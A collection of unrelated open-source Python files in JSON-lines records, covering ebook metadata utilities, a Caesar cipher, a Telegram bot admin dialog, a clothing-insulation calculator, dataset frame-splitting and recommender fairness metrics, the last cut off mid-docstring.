\n        left_ones = 0\n        left_minusones = 0\n        sep_error = -1\n        sep_index = 0\n        error = -1\n        for idx, el in enumerate(array):\n            # running through the array, at each element we determine the\n            # number of 1's and -1's in the left vs. right subarray\n            if el == 1:\n                left_ones += 1\n            else:\n                left_minusones += 1\n            right_ones = ones - left_ones\n            right_minus_ones = minus_ones - left_minusones\n\n            # we want each subarray to be as homogeneous as possible, i.e.\n            # predominantly positive or predominantly negative\n            # we measure the separation of the cut as\n            # the maximum of\n            # the number of 1's in the left plus number of -1's in right and\n            # the number of -1's in the left plus the number of 1's in the right\n            cur_error = max(left_ones + right_minus_ones, left_minusones + right_ones)\n            if cur_error > sep_error:\n                sep_error = cur_error\n                sep_index = idx\n                # the actual error is the larger of the two sides' minority counts,\n                # i.e. the impurity of the less homogeneous side\n                error = max(min(left_minusones, left_ones), min(right_minus_ones, right_ones))\n\n        return sep_index, sep_error, error\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"eidonfiloi/SparseRecurrentNetwork","sub_path":"tests/min_seperation.py","file_name":"min_seperation.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"}
{"seq_id":"72916643986","text":"\"\"\"\nProvides abstraction for metadata reading/writing from a variety of ebook\nformats.\n\"\"\"\nimport mimetypes\nimport os\nimport re\nimport sys\nimport urllib.parse\n\nfrom ebook_converter.utils.config_base import tweaks\nfrom ebook_converter import polyglot\nfrom ebook_converter.utils import encoding as uenc\n\n\ntry:\n    _author_pat = re.compile(tweaks['authors_split_regex'])\nexcept Exception:\n    print(f\"Author split regexp: {tweaks['authors_split_regex']}, is invalid, \"\n          f\"using default\")\n    _author_pat = re.compile(r'(?i),?\\s+(and|with)\\s+')\n\n\ndef string_to_authors(raw):\n    if not raw:\n        return []\n    raw = raw.replace('&&', '\uffff')\n    raw = _author_pat.sub('&', raw)\n    authors = [a.strip().replace('\uffff', '&') for a in raw.split('&')]\n    return [a for a in authors if a]\n\n\ndef authors_to_string(authors):\n    if authors is not None:\n        return ' & '.join([a.replace('&', '&&') for a in authors if a])\n    else:\n        return ''\n\n\ndef remove_bracketed_text(src, brackets=None):\n    if brackets is None:\n        brackets = {'(': ')', '[': ']', '{': '}'}\n    from collections import Counter\n    counts = Counter()\n    buf = []\n    src = uenc.force_unicode(src)\n    rmap = {v: k for k, v in brackets.items()}\n    for char in src:\n        if char in brackets:\n            counts[char] += 1\n        elif char in rmap:\n            idx = rmap[char]\n            if counts[idx] > 0:\n                counts[idx] -= 1\n        elif sum(counts.values()) < 1:\n            buf.append(char)\n    return ''.join(buf)\n\n\ndef author_to_author_sort(author, method=None):\n    if not author:\n        return ''\n    sauthor = remove_bracketed_text(author).strip()\n    tokens = sauthor.split()\n    if len(tokens) < 2:\n        return author\n    if method is None:\n        method = tweaks['author_sort_copy_method']\n\n    ltoks = frozenset(x.lower() for x in tokens)\n    copy_words = frozenset(x.lower() for x in tweaks['author_name_copywords'])\n    if ltoks.intersection(copy_words):\n        method = 'copy'\n\n    if method == 'copy':\n        return author\n\n    prefixes = {uenc.force_unicode(y).lower()\n                for y in tweaks['author_name_prefixes']}\n    prefixes |= {y+'.' for y in prefixes}\n    while True:\n        if not tokens:\n            return author\n        tok = tokens[0].lower()\n        if tok in prefixes:\n            tokens = tokens[1:]\n        else:\n            break\n\n    suffixes = {uenc.force_unicode(y).lower()\n                for y in tweaks['author_name_suffixes']}\n    suffixes |= {y+'.' 
for y in suffixes}\n\n suffix = ''\n while True:\n if not tokens:\n return author\n last = tokens[-1].lower()\n if last in suffixes:\n suffix = tokens[-1] + ' ' + suffix\n tokens = tokens[:-1]\n else:\n break\n suffix = suffix.strip()\n\n if method == 'comma' and ',' in ''.join(tokens):\n return author\n\n atokens = tokens[-1:] + tokens[:-1]\n num_toks = len(atokens)\n if suffix:\n atokens.append(suffix)\n\n if method != 'nocomma' and num_toks > 1:\n atokens[0] += ','\n\n return ' '.join(atokens)\n\n\ndef authors_to_sort_string(authors):\n return ' & '.join(map(author_to_author_sort, authors))\n\n\n_title_pats = {}\n\n\ndef get_title_sort_pat(lang=None):\n ans = _title_pats.get(lang, None)\n if ans is not None:\n return ans\n q = lang\n from ebook_converter.utils.localization import canonicalize_lang, get_lang\n if lang is None:\n q = tweaks['default_language_for_title_sort']\n if q is None:\n q = get_lang()\n q = canonicalize_lang(q) if q else q\n data = tweaks['per_language_title_sort_articles']\n try:\n ans = data.get(q, None)\n except AttributeError:\n ans = None # invalid tweak value\n try:\n ans = frozenset(ans) if ans else frozenset(data['eng'])\n except:\n ans = frozenset((r'A\\s+', r'The\\s+', r'An\\s+'))\n ans = '|'.join(ans)\n ans = '^(%s)' % ans\n try:\n ans = re.compile(ans, re.IGNORECASE)\n except:\n ans = re.compile(r'^(A|The|An)\\s+', re.IGNORECASE)\n _title_pats[lang] = ans\n return ans\n\n\n_ignore_starts = '\\'\"'+''.join(chr(x) for x in\n list(range(0x2018, 0x201e))+[0x2032, 0x2033])\n\n\ndef title_sort(title, order=None, lang=None):\n if order is None:\n order = tweaks['title_series_sorting']\n title = title.strip()\n if order == 'strictly_alphabetic':\n return title\n if title and title[0] in _ignore_starts:\n title = title[1:]\n match = get_title_sort_pat(lang).search(title)\n if match:\n try:\n prep = match.group(1)\n except IndexError:\n pass\n else:\n title = title[len(prep):] + ', ' + prep\n if title[0] in _ignore_starts:\n title = title[1:]\n return title.strip()\n\n\ncoding = list(zip(\n[1000,900,500,400,100,90,50,40,10,9,5,4,1],\n[\"M\",\"CM\",\"D\",\"CD\",\"C\",\"XC\",\"L\",\"XL\",\"X\",\"IX\",\"V\",\"IV\",\"I\"]\n))\n\n\ndef roman(num):\n if num <= 0 or num >= 4000 or int(num) != num:\n return str(num)\n result = []\n for d, r in coding:\n while num >= d:\n result.append(r)\n num -= d\n return ''.join(result)\n\n\ndef fmt_sidx(i, fmt='%.2f', use_roman=False):\n if i is None or i == '':\n i = 1\n try:\n i = float(i)\n except TypeError:\n return str(i)\n if int(i) == float(i):\n return roman(int(i)) if use_roman else '%d'%int(i)\n return fmt%i\n\n\nclass Resource(object):\n\n '''\n Represents a resource (usually a file on the filesystem or a URL pointing\n to the web. 
Such resources are commonly referred to in OPF files.\n\n They have the interface:\n\n :member:`path`\n :member:`mime_type`\n :method:`href`\n\n '''\n\n def __init__(self, href_or_path, basedir=os.getcwd(), is_path=True):\n self._href = None\n self._basedir = basedir\n self.path = None\n self.fragment = ''\n try:\n self.mime_type = mimetypes.guess_type(href_or_path)[0]\n except:\n self.mime_type = None\n if self.mime_type is None:\n self.mime_type = 'application/octet-stream'\n if is_path:\n path = href_or_path\n if not os.path.isabs(path):\n path = os.path.abspath(os.path.join(basedir, path))\n if isinstance(path, bytes):\n path = path.decode(sys.getfilesystemencoding())\n self.path = path\n else:\n url = urllib.parse.urlparse(href_or_path)\n if url[0] not in ('', 'file'):\n self._href = href_or_path\n else:\n pc = url[2]\n if isinstance(pc, str):\n pc = pc.encode('utf-8')\n pc = polyglot.unquote(pc).decode('utf-8')\n self.path = os.path.abspath(os.path.join(basedir,\n pc.replace('/',\n os.sep)))\n self.fragment = polyglot.unquote(url[-1])\n\n def href(self, basedir=None):\n '''\n Return a URL pointing to this resource. If it is a file on the filesystem\n the URL is relative to `basedir`.\n\n `basedir`: If None, the basedir of this resource is used (see :method:`set_basedir`).\n If this resource has no basedir, then the current working directory is used as the basedir.\n '''\n if basedir is None:\n if self._basedir:\n basedir = self._basedir\n else:\n basedir = os.getcwd()\n if self.path is None:\n return self._href\n frag = '#' + urllib.parse.quote(self.fragment) if self.fragment else ''\n if self.path == basedir:\n return '' + frag\n try:\n rpath = os.path.relpath(self.path, basedir)\n except OSError: # On windows path and basedir could be on different drives\n rpath = self.path\n return urllib.parse.quote(rpath.replace(os.sep, '/')) + frag\n\n def set_basedir(self, path):\n self._basedir = path\n\n def basedir(self):\n return self._basedir\n\n def __repr__(self):\n return 'Resource(%s, %s)'%(repr(self.path), repr(self.href()))\n\n\nclass ResourceCollection(object):\n\n def __init__(self):\n self._resources = []\n\n def __iter__(self):\n for r in self._resources:\n yield r\n\n def __len__(self):\n return len(self._resources)\n\n def __getitem__(self, index):\n return self._resources[index]\n\n def __bool__(self):\n return len(self._resources) > 0\n\n def __str__(self):\n resources = map(repr, self)\n return '[%s]'%', '.join(resources)\n\n def __repr__(self):\n return str(self)\n\n def append(self, resource):\n if not isinstance(resource, Resource):\n raise ValueError('Can only append objects of type Resource')\n self._resources.append(resource)\n\n def remove(self, resource):\n self._resources.remove(resource)\n\n def replace(self, start, end, items):\n 'Same as list[start:end] = items'\n self._resources[start:end] = items\n\n @staticmethod\n def from_directory_contents(top, topdown=True):\n collection = ResourceCollection()\n for spec in os.walk(top, topdown=topdown):\n path = os.path.abspath(os.path.join(spec[0], spec[1]))\n res = Resource.from_path(path)\n res.set_basedir(top)\n collection.append(res)\n return collection\n\n def set_basedir(self, path):\n for res in self:\n res.set_basedir(path)\n\n\ndef MetaInformation(title, authors=('Unknown',)):\n ''' Convenient encapsulation of book metadata, needed for compatibility\n @param title: title or ``'Unknown'`` or a MetaInformation object\n @param authors: List of strings or []\n '''\n from ebook_converter.ebooks.metadata.book.base 
import Metadata\n mi = None\n if hasattr(title, 'title') and hasattr(title, 'authors'):\n mi = title\n title = mi.title\n authors = mi.authors\n return Metadata(title, authors, other=mi)\n\n\ndef check_isbn10(isbn):\n try:\n digits = tuple(map(int, isbn[:9]))\n products = [(i+1)*digits[i] for i in range(9)]\n check = sum(products)%11\n if (check == 10 and isbn[9] == 'X') or check == int(isbn[9]):\n return isbn\n except Exception:\n pass\n return None\n\n\ndef check_isbn13(isbn):\n try:\n digits = tuple(map(int, isbn[:12]))\n products = [(1 if i%2 ==0 else 3)*digits[i] for i in range(12)]\n check = 10 - (sum(products)%10)\n if check == 10:\n check = 0\n if str(check) == isbn[12]:\n return isbn\n except Exception:\n pass\n return None\n\n\ndef check_isbn(isbn):\n if not isbn:\n return None\n isbn = re.sub(r'[^0-9X]', '', isbn.upper())\n all_same = re.match(r'(\\d)\\1{9,12}$', isbn)\n if all_same is not None:\n return None\n if len(isbn) == 10:\n return check_isbn10(isbn)\n if len(isbn) == 13:\n return check_isbn13(isbn)\n return None\n\n\ndef check_issn(issn):\n if not issn:\n return None\n issn = re.sub(r'[^0-9X]', '', issn.upper())\n try:\n digits = tuple(map(int, issn[:7]))\n products = [(8 - i) * d for i, d in enumerate(digits)]\n check = 11 - sum(products) % 11\n if (check == 10 and issn[7] == 'X') or check == int(issn[7]):\n return issn\n except Exception:\n pass\n return None\n\n\ndef format_isbn(isbn):\n cisbn = check_isbn(isbn)\n if not cisbn:\n return isbn\n i = cisbn\n if len(i) == 10:\n return '-'.join((i[:2], i[2:6], i[6:9], i[9]))\n return '-'.join((i[:3], i[3:5], i[5:9], i[9:12], i[12]))\n\n\ndef check_doi(doi):\n 'Check if something that looks like a DOI is present anywhere in the string'\n if not doi:\n return None\n doi_check = re.search(r'10\\.\\d{4}/\\S+', doi)\n if doi_check is not None:\n return doi_check.group()\n return None\n","repo_name":"gryf/ebook-converter","sub_path":"ebook_converter/ebooks/metadata/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12090,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"48"} +{"seq_id":"23041914389","text":"#!/usr/bin/env python\nfrom stns.gui import SpikeDetectionGUI\nfrom glob import glob\n#file_name = '/Users/loganfickling/Downloads/Actinonin/data/11-1-20/11_1_20_LF_a.smr'\n\"\"\"\nfile_name = '/Users/loganfickling/Downloads/most recent/1_28_21_LF_d.smr'\napp = SpikeDetectionGUI(provided_path=file_name)\napp.mainloop()\"\"\"\n\nfile_names = sorted(glob('/Users/loganfickling/Downloads/Hemo*/12-13*/*.smr'))\n#file_names = sorted(glob('/Users/loganfickling/Desktop/Lingli- LPG kills and AB kills/11-03*/*.smr'))\n#file_names = glob(file_name + 'Lingli_Data_Transferred/Data/*/*.smr')\nfor file_name in file_names:\n print('Starting file {}'.format(file_name),flush=True)\n app = SpikeDetectionGUI(provided_path=file_name)\n app.mainloop()\n del(app)\n\n","repo_name":"LoganJF/stns","sub_path":"stns/examples/launchgui.py","file_name":"launchgui.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33063119426","text":"import art\n\nprint(art.logo)\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndef caesar(in_text, shift_amount, 
encode_decode):\n    out_text = \"\"\n    if encode_decode == \"decode\":\n        shift_amount *= -1\n    for char in in_text:\n        if char in alphabet:\n            position = alphabet.index(char)\n            new_position = position + shift_amount\n            out_text += alphabet[new_position]\n        else:\n            out_text += char\n    print(f\"Your {encode_decode}d message is {out_text}\")\n\ncipher_on = True\n\nwhile cipher_on:\n    direction = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\n    text = input(\"Type your message:\\n\").lower()\n    # keep the shift inside the alphabet's range\n    shift = int(input(\"Type the shift number:\\n\")) % 26\n    caesar(in_text=text, shift_amount=shift, encode_decode=direction)\n\n    repeat = input(\"Would you like to run again? Type 'y' or 'n':\\n\")\n    if repeat.lower() == 'n':\n        # stop the loop; previously cipher_on was never set to False,\n        # so the program could not actually exit\n        print(\"Goodbye\")\n        cipher_on = False\n    elif repeat.lower() != 'y':\n        print(\"Pick a valid option.\")","repo_name":"marshallc03/caesar-cipher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"26074558525","text":"import telegram.error\nfrom telegram.ext import ContextTypes, ConversationHandler, MessageHandler, CallbackQueryHandler, CommandHandler, filters\nfrom telegram import Update, InlineKeyboardButton, InlineKeyboardMarkup\nfrom database.db_bilder import session, Topic, Master\nfrom admin.publish_content import message_update\n\nMASTER, OPTION, ACTION, ANSWER, UPDATE = range(5)\n\n\nasync def choice_topic(update: Update, context: ContextTypes.DEFAULT_TYPE):\n    if update.message.from_user.id not in [366585, 352354383]:\n        await update.message.reply_text('Я тебя не знаю!')\n        return ConversationHandler.END\n    keyboard_topic = []\n    for topic in session.query(Topic).all():\n        keyboard_topic.append([InlineKeyboardButton(text=topic.title, callback_data=f'{topic.topic_id}')])\n    await update.message.reply_text('Выберите топик в котором нужно изменить данные мастера:',\n                                    reply_markup=InlineKeyboardMarkup(keyboard_topic))\n    return MASTER\n\n\nasync def choice_master(update: Update, context: ContextTypes.DEFAULT_TYPE):\n    target_topic_id = int(update.callback_query.data)\n    keyboard_master = []\n    for master in session.query(Master).where(Master.topic_master == target_topic_id).all():\n        if master.company_name is not None:\n            keyboard_master.append([InlineKeyboardButton(text=f'{master.company_name}: {master.phone}',\n                                                         callback_data=f'{master.master_id}')])\n        elif master.name is not None:\n            keyboard_master.append([InlineKeyboardButton(text=f'{master.name}: {master.phone}',\n                                                         callback_data=f'{master.master_id}')])\n    await update.callback_query.edit_message_text(text='Выберите мастера:',\n                                                  reply_markup=InlineKeyboardMarkup(keyboard_master))\n    return OPTION\n\n\nasync def choice_option(update: Update, context: ContextTypes.DEFAULT_TYPE):\n    print(update.callback_query.data)\n    master_id = int(update.callback_query.data)\n    keyboard_option = [\n        [InlineKeyboardButton(text='Название организации', callback_data=f'{master_id},company_name')],\n        [InlineKeyboardButton(text='Имя', callback_data=f'{master_id},name')],\n        [InlineKeyboardButton(text='Телефон', callback_data=f'{master_id},phone')],\n        [InlineKeyboardButton(text='Telegram', callback_data=f'{master_id},telegram')],\n        [InlineKeyboardButton(text='Адрес', callback_data=f'{master_id},addres')],\n        [InlineKeyboardButton(text='Специализация', 
callback_data=f'{master_id},specialization')],\n        [InlineKeyboardButton(text='Опционально', callback_data=f'{master_id},optional')]\n    ]\n    await update.callback_query.edit_message_text(text='Выберите категорию:',\n                                                  reply_markup=InlineKeyboardMarkup(keyboard_option))\n    return ACTION\n\n\nasync def choice_action(update: Update, context: ContextTypes.DEFAULT_TYPE):\n    data = update.callback_query.data\n    keyboard_action = [\n        [InlineKeyboardButton(text='Изменить', callback_data=f'UP,{data}'),\n         InlineKeyboardButton(text='Удалить', callback_data=f'DEL,{data}')]\n    ]\n    await update.callback_query.edit_message_text(text='Выберите действие:', reply_markup=InlineKeyboardMarkup(keyboard_action))\n    return ANSWER\n\n\nasync def action_answer(update: Update, context: ContextTypes.DEFAULT_TYPE):\n    answer = update.callback_query.data.split(',')\n\n    master = session.query(Master).where(Master.master_id == answer[1]).one()\n\n    for key in master.__to_dict__().keys():\n        if key == answer[2]:\n            if answer[0] == 'DEL':\n                setattr(master, key, None)\n                session.commit()\n                await update.callback_query.edit_message_text('Значение успешно удалено.')\n                return ConversationHandler.END\n            if answer[0] == 'UP':\n                setattr(master, key, 'WAITING FOR UPDATE')\n                session.commit()\n                await update.callback_query.edit_message_text('Введите новое значение:')\n                return UPDATE\n\n\nasync def update_data(update: Update, context: ContextTypes.DEFAULT_TYPE):\n    new_data = update.message.text\n    masters = session.query(Master).all()\n    for master in masters:\n        for key, values in master.__to_dict__().items():\n            # the sentinel written by action_answer marks the field to update\n            if values == 'WAITING FOR UPDATE':\n                setattr(master, key, new_data)\n                session.commit()\n                try:\n                    await message_update(update, context, master.master_id)\n                except telegram.error.BadRequest:\n                    continue\n    await update.message.reply_text('Значение успешно обновлено.')\n    return ConversationHandler.END\n\n\nasync def stop_conversation(update: Update, context: ContextTypes.DEFAULT_TYPE):\n    await update.message.reply_text('Диалог остановлен')\n    return ConversationHandler.END\n\nupdate_conversation = ConversationHandler(\n    entry_points=[MessageHandler(filters.Regex('Изменить информацию о мастере'), choice_topic)],\n    states={\n        MASTER: [CallbackQueryHandler(callback=choice_master)],\n        OPTION: [CallbackQueryHandler(callback=choice_option)],\n        ACTION: [CallbackQueryHandler(callback=choice_action)],\n        ANSWER: [CallbackQueryHandler(callback=action_answer)],\n        UPDATE: [MessageHandler(filters.TEXT, update_data)]\n    },\n    fallbacks=[CommandHandler('stop', stop_conversation)], conversation_timeout=120)\n","repo_name":"sweetsenpai/psprof_bot","sub_path":"admin/update_masters.py","file_name":"update_masters.py","file_ext":"py","file_size_in_byte":5837,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
{"seq_id":"71142312466","text":"import itertools as it  # used to enumerate outfit combinations\n\n\n# Algorithm with clo values pre-installed\n# only using a few items to show method, clo values are accurate\nwith open(\"clothes.txt\", \"r\") as myfile:\n    for i, line in enumerate(myfile):\n        if i == 0:\n            data = line.strip()\n        if i == 3:\n            temp = line.strip()\n            temp = float(temp[23:28])\n\nmy_clothes = eval(data)\ndef return_key(val, category):\n    for garment in my_clothes[category]:\n        if my_clothes[category][garment] == val:\n            return garment\n# clo varies by 0.16 for every degree on average\n# at 21C (standard room temperature) clo is 1\n# wind chill can be added later\n\nclo_value = 1+((21-temp)*0.16)  # suggested clo value\n
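\n# worked example of the formula above: if the file reports temp = 15 (deg C),\n# then clo_value = 1 + (21 - 15)*0.16 = 1.96, i.e. colder air suggests more insulation\n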
\ncombinations = it.product(*my_clothes.values())\nmylist = list(combinations)\nbest = 999\nfor i in mylist:\n    count = 0\n    total = 0\n    newlist = []\n    for j in my_clothes:\n        newlist.append(my_clothes[j][i[count]])\n        count += 1\n    total = sum(newlist)\n    if abs(clo_value - total) < best:\n        best = abs(clo_value - total)\n        best_list = newlist\ncount = 0\nprint(\"Best option to wear today: \")\nfor i in my_clothes:\n    print(return_key(best_list[count], i))\n    count = count + 1\n","repo_name":"DCJoshSP/RaspberryPi","sub_path":"clo value algorithm.py","file_name":"clo value algorithm.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"44096334575","text":"import os\r\nimport sys\r\n\r\nsys.path.insert(0, os.path.join(os.getcwd()))\r\nimport glob\r\nimport argparse\r\nimport json\r\nimport numpy as np\r\nimport math\r\nimport cv2\r\nfrom natsort import natsorted\r\n\r\nimport shutil\r\n\r\n### the start frame of each --split pair begins a new folder ###\r\n\r\n### python split.py --dir 230822 --split 15 85 150 ...\r\n\r\n# --split is given as start,end pairs, one pair per trial\r\n\r\nparser = argparse.ArgumentParser()\r\nparser.add_argument('--dir', type=str, default=\"230822_S01_obj_01\")\r\n\r\n# --split {trial_0 start frame} {trial_0 end frame} ... {trial_n start frame} {trial_n end frame}\r\nparser.add_argument('--split', type=int, nargs='+', required=True)\r\n# --grasp 5 17 20 (recorded grasp class)\r\nparser.add_argument('--grasp', type=int, nargs='+', required=True)\r\n# --trialnum 7 7 6 (each class's trial count)\r\nparser.add_argument('--trialnum', type=int, nargs='+', required=True)\r\n\r\nargs = parser.parse_args()\r\n\r\n\r\ndef main():\r\n    input_folder = args.dir\r\n    # num_trials = args.trials\r\n    split_list = args.split\r\n\r\n    grasp_class_list = args.grasp\r\n    trialnum_list = args.trialnum\r\n\r\n    if not os.path.exists(os.path.join(input_folder, 'rgb')) or not os.path.exists(os.path.join(input_folder, 'depth')):\r\n        raise Exception(\"no rgb, depth folder in input folder %s, check the --dir\" % (input_folder))\r\n\r\n    # input_list = os.listdir(os.path.join(input_folder, 'rgb/mas'))\r\n    # input_list = natsorted(input_list)\r\n\r\n    if len(split_list) % 2 != 0:\r\n        raise Exception(\"--split requires an even number of values (start,end pairs), check.\")\r\n\r\n    num_trials = int(len(split_list) / 2)\r\n    print(\"total trial num : \", num_trials)\r\n\r\n    grasp_idx = 0\r\n    trial_idx = 0\r\n\r\n    for i in range(num_trials):\r\n\r\n        start_idx = split_list[i * 2]\r\n        end_idx = split_list[i * 2 + 1]\r\n\r\n        # create grasp folder\r\n        sub_grasp_name = input_folder + '_grasp_' + str(grasp_class_list[grasp_idx])\r\n        sub_trial_name = 'trial_' + str(trial_idx)\r\n\r\n        os.makedirs(os.path.join(input_folder, sub_grasp_name, sub_trial_name), exist_ok=True)\r\n        os.makedirs(os.path.join(input_folder, sub_grasp_name, sub_trial_name, 'rgb'), exist_ok=True)\r\n        os.makedirs(os.path.join(input_folder, sub_grasp_name, sub_trial_name, 'depth'), 
exist_ok=True)\r\n\r\n src_rgb = os.path.join(input_folder, 'rgb', cam, cam + '_' + str(j) + '.jpg')\r\n dest_rgb = os.path.join(output_rgb_path, cam, cam + '_' + str(num) + '.jpg')\r\n src_depth = os.path.join(input_folder, 'depth', cam, cam + '_' + str(j) + '.png')\r\n dest_depth = os.path.join(output_depth_path, cam, cam + '_' + str(num) + '.png')\r\n\r\n try:\r\n shutil.copy(src_rgb, dest_rgb)\r\n shutil.copy(src_depth, dest_depth)\r\n\r\n except:\r\n print('missing', src_rgb)\r\n print('missing', src_depth)\r\n fail = 1\r\n continue\r\n\r\n if fail == 0:\r\n num += 1\r\n\r\n\r\n trial_idx += 1\r\n\r\n if trial_idx == trialnum_list[grasp_idx]:\r\n trial_idx = 0\r\n grasp_idx += 1\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"UVR-WJCHO/HOnnotate_OXR","sub_path":"modules/kinectCapture/split.py","file_name":"split.py","file_ext":"py","file_size_in_byte":3778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7079300999","text":"# Aggregate of a lookup.\n\nfrom incoq.runtime import *\n\nOPTIONS(\n default_impl = 'inc',\n)\n\nR = Set()\n\nfor x in [('A', 1), ('A', 2), ('A', 3), ('B', 4), ('B', 5)]:\n R.add(x)\n\nR.remove(('B', 5))\n\nk = 'A'\nprint(sum(setmatch(R, 'bu', k)))\n","repo_name":"IncOQ/incoq","sub_path":"incoq/tests/programs/aggr/params_in.py","file_name":"params_in.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"20787573274","text":"from __future__ import annotations\nimport itertools\nimport random\nfrom abc import abstractmethod\nfrom collections import Counter, defaultdict\n\nimport pandas as pd\nimport numpy as np\nfrom typing import Dict, Set, List, Union, TYPE_CHECKING\n\nif TYPE_CHECKING:\n from clayrs.content_analyzer import Ratings\n from clayrs.recsys.partitioning import Split\n\nfrom clayrs.evaluation.metrics.metrics import Metric\nfrom clayrs.evaluation.utils import get_avg_pop, pop_ratio_by_user, get_item_popularity, get_most_popular_items\nfrom clayrs.evaluation.exceptions import NotEnoughUsers\nfrom clayrs.utils.const import logger\n\n\nclass FairnessMetric(Metric):\n \"\"\"\n Abstract class that generalize fairness metrics\n \"\"\"\n\n @abstractmethod\n def perform(self, split: Split):\n raise NotImplementedError\n\n\nclass GroupFairnessMetric(FairnessMetric):\n \"\"\"\n Abstract class for fairness metrics based on user groups\n\n It has some concrete methods useful for group divisions, since every subclass needs to split users into groups.\n\n Args:\n user_groups: Dict containing group names as keys and percentage of users as value, used to\n split users in groups. 
Users with more popular items rated are grouped into the first group, users with\n slightly less popular items rated are grouped into the second one, etc.\n \"\"\"\n\n def __init__(self, user_groups: Dict[str, float]):\n self.__user_groups = user_groups\n\n @property\n def user_groups(self):\n return self.__user_groups\n\n @abstractmethod\n def perform(self, split: Split):\n raise NotImplementedError\n\n @staticmethod\n def get_avg_pop_by_users(data: Ratings, pop_by_items: Dict, group: Set[str] = None) -> Dict[str, float]:\n r\"\"\"\n Get the average popularity for each user in the `data` parameter.\n\n Average popularity of a single user $u$ is defined as:\n\n $$\n avg\\_pop_u = \\frac{\\sum_{i \\in i_u} pop_i}{|i_u|}\n $$\n\n Args:\n data: The `Ratings` object that will be used to compute average popularity of each user\n pop_by_items: popularity for each label ('label', 'popularity')\n group: (optional) the set of users (user_id)\n\n Returns:\n Python dictionary containing as keys each user id and as values the average popularity of each user\n \"\"\"\n if group is None:\n group = data.unique_user_id_column\n group_int = data.unique_user_idx_column\n else:\n group_int = data.user_map.convert_seq_str2int(list(group))\n\n avg_pop_by_users = []\n\n for user_idx in group_int:\n user_interactions_rows = data.get_user_interactions(user_idx, as_indices=True)\n user_items = data.item_id_column[user_interactions_rows]\n\n avg_pop_by_users.append(get_avg_pop(user_items, pop_by_items))\n\n avg_pop_by_users = dict(zip(group, avg_pop_by_users))\n\n return avg_pop_by_users\n\n @staticmethod\n def split_user_in_groups(score_frame: Ratings, groups: Dict[str, float],\n pop_items: Set[str]) -> Dict[str, Set[str]]:\n r\"\"\"\n Users are split into groups based on the *groups* parameter, which contains names of the groups as keys,\n and percentage of how many user must contain a group as values. For example:\n\n groups = {'popular_users': 0.3, 'medium_popular_users': 0.2, 'low_popular_users': 0.5}\n\n Every user will be inserted in a group based on how many popular items the user has rated (in relation to the\n percentage of users we specified as value in the dictionary):\n\n * users with many popular items will be inserted into the first group\n * users with niche items rated will be inserted into one of the last groups.\n\n In general users are grouped by $Popularity\\_ratio$ in a descending order. $Popularity\\_ratio$ for a\n single user $u$ is defined as:\n\n $$\n Popularity\\_ratio_u = n\\_most\\_popular\\_items\\_rated_u / n\\_items\\_rated_u\n $$\n\n The *most popular items* are the first `pop_percentage`% items of all items ordered in a descending order by\n popularity.\n\n The popularity of an item is defined as the number of times it is rated in the `original_ratings` parameter\n divided by the total number of users in the `original_ratings`.\n\n Args:\n score_frame: the Ratings object\n groups: each key contains the name of the group and each value contains the\n percentage of the specified group. If the groups don't cover the entire user collection,\n the rest of the users are considered in a 'default_diverse' group\n pop_items: set of most popular *item_id* labels\n\n Returns:\n A python dictionary containing as keys each group name and as values the set of *user_id* belonging to\n the particular group.\n \"\"\"\n num_of_users = len(score_frame.unique_user_id_column)\n if num_of_users < len(groups):\n raise NotEnoughUsers(\"You can't split in {} groups {} users! 
\"\n                                 \"Try reducing number of groups\".format(len(groups), num_of_users))\n\n        for percentage_chosen in groups.values():\n            if not 0 < percentage_chosen <= 1:\n                raise ValueError('Incorrect percentage! Valid percentage range: 0 < percentage <= 1')\n        total = sum(groups.values())\n        if total > 1:\n            raise ValueError(\"Incorrect percentage! Sum of percentages is greater than 1\")\n        elif total < 1:\n            raise ValueError(\"Sum of percentages is less than 1! Please add another group or redistribute percentages \"\n                             \"among already defined groups to reach a total of 1!\")\n\n        pop_ratio_by_users = pop_ratio_by_user(score_frame, most_pop_items=pop_items)\n        pop_ratio_by_users = sorted(pop_ratio_by_users, key=pop_ratio_by_users.get, reverse=True)\n\n        groups_dict: Dict[str, Set[str]] = {}\n        last_index = 0\n        percentage = 0.0\n        for group_name in groups:\n            percentage += groups[group_name]\n            group_index = round(num_of_users * percentage)\n            if group_index == 0:\n                logger.warning('Not enough rows for group {}! It will be discarded'.format(group_name))\n            else:\n                groups_dict[group_name] = set(pop_ratio_by_users[last_index:group_index])\n                last_index = group_index\n        return groups_dict\n\n\nclass GiniIndex(FairnessMetric):\n    r\"\"\"\n    The Gini Index metric measures inequality in recommendation lists. It's a system-wide metric, so only its\n    result will be returned and not those of every user.\n    The metric is calculated as such:\n\n    $$\n    Gini_{sys} = \\frac{\\sum_i(2i - n - 1)x_i}{n\\cdot\\sum_i x_i}\n    $$\n\n    Where:\n\n    - $n$ is the total number of distinct items that are being recommended\n    - $x_i$ is the number of times that the item $i$ has been recommended\n\n    A perfectly equal recommender system should recommend every item the same number of times, in which case the Gini\n    index would be equal 